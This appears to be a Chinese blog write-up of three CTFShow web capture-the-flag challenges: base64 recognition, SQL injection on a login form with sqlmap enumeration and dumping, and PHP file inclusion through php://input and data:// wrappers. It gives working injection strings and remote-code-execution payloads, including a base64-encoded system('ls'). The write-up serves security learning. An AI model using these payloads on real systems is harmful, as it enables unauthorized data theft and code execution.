当前位置: 首页 > news >正文

ctfshow——web(持续更新)

文章目录

  • 1、web签到题——base64编码特征
  • 2、web2——登录框测试&sqlmap使用
  • 3、web3——php伪协议

1、web签到题——base64编码特征

查看源代码:
在这里插入图片描述
base64编码特征:大小写+数字,偶尔最后几位是=

2、web2——登录框测试&sqlmap使用

登录界面,先测一下是不是存在SQL注入漏洞
在这里插入图片描述
SQL注入常见的测试方法就是:

  • 在参数后面加个',看返回包是否报错;
  • 使用万能密码1' or 1=1 --+,看返回包有没有反应;

    这里返回内容会有变化。显示欢迎你,ctfshow,应该是成功登录的结果,但是并没有数据返回。
    在这里插入图片描述

  • 再用时间盲注进一步证明存在SQL注入漏洞。1' or sleep(5) --+,会有明显的时间延迟。

再用sqlmap去跑数据库里的内容:(这里直接跑数据包)

python3 sqlmap.py -r test.txt # 在存在sql注入漏洞的参数后面加*
python3 sqlmap.py -r test.txt --dbs  #--dbs选项是列出所有数据库名
python3 sqlmap.py -r test.txt -D web2 --tables # 表名
python3 sqlmap.py -r test.txt -D web2 -T flag --columns # 字段
python3 sqlmap.py -r test.txt -D web2 -T flag -C flag --dump # 字段内容

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、web3——php伪协议

看到include函数,这一题应该是与文件包含有关。<?php include($_GET['url'])?>是包含GET传参中url参数的值,那么可以考虑php伪协议中的input协议和data协议
在这里插入图片描述
关于php://input和data://text/plain,简单来说:

  • php://inputinclude连用时,数据包中的post字段将会当做php代码执行;
  • data://text/plaininclude连用时,data://text/plain后面接着的数据会被当做php代码执行。

故,poc:

# GET传参
?url=php://input
# POST
<?php system("ls");?> ?url=data://text/plain,<?php system('ls');?>
?url=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOz8+

在这里插入图片描述


http://www.mrgr.cn/news/60012.html

相关文章:

  • (二十二)Java网络编程
  • Linux TCP CC状态机
  • 基于centos7.9搭建在线购物网站
  • 华为OD机试真题-考勤信息
  • idea中 Maven lifecycle 和 plugins的区别
  • Mac apache配置cgi环境-修改httpd.conf文件、启动apache
  • 指数运算和幂运算
  • redis详细教程(3.hash和set类型)
  • 计算机网络——有连接传输层协议TCP
  • java平方根计算 C语言指针变量
  • UICC运营商特权与eSIM配置文件冲突问题
  • 系统滴答定时器
  • 构成正方形的数量
  • 基于SSM+微信小程序的跑腿平台管理系统(跑腿3)
  • 进程间通信(管道)
  • 【已解决,含泪总结】非root权限在服务器上配置python和torch环境,代码最终成功训练(一)
  • Ubuntu22.04编译安装实时内核
  • 2-135 基于matlab的有限差分法计算电位分布
  • 1025. 除数博弈
  • maven之pom.xml文件解读
  • flink1.17.2安装和使用
  • 基于协同过滤算法的旅游网站推荐系统
  • iTerm2 保持SSH远程连接
  • PyQt入门指南二十九 QListView列表视图组件
  • leetcode day7 442
  • 揭秘:如何用Puppeteer和BrowserWS解锁网站性能的隐秘角落